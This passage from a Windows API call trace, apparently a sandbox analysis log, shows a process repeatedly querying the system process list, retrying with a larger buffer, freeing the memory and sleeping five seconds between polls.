Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.188] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.196] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.204] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.210] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.218] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.227] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.236] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.243] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.251] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.258] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.266] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.278] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.286] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.294] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.300] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.307] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.315] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.322] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.338] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.383] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 